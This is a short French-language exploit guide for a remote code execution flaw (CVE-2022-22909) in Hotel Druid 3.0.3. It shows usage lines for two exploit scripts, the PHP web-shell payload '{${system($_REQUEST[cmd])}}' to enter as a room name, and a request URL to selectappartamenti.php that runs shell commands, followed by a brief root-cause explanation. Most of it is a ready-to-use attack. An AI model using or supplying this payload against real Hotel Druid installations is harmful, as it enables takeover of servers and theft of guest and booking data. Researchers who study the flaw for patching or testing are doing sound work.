
Exploits pour Hotel Druid 3.0.3 - Exécution de code à distance (RCE) CVE-2022-22909
Cet exploit créera une nouvelle chambre avec notre charge utile PHP comme nom de chambre.
Utilisation :
$ ./HotelDruidExploit.py -h

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

Cet exploit fonctionnera si vous connaissez déjà le nom de la chambre.
Utilisation :
$ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

1). Accédez à la page Hotel Druid.
2). Cliquez sur Tables -> Rooms

3). Dans le champ Create New Room, ajoutez le code PHP ci-dessous, puis cliquez sur Add.
{${system($_REQUEST[cmd])}}

4). Vous verrez la nouvelle chambre avec notre charge utile dans le champ du nom « Room ».

5). Allez sur le lien ci-dessous et vous obtiendrez l'exécution de commandes, plus tard vous pourrez obtenir un shell complet
http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami
Note : Remplacez l'IP par l'IP cible de votre hoteldruid.
Cette vulnérabilité se produit car les noms de chambres sont stockés dans /var/www/html/hoteldruid/dati/selectappartamenti.php

Et selectappartamenti.php est un fichier PHP, donc tout code PHP contenu dans ce fichier sera exécuté par le serveur.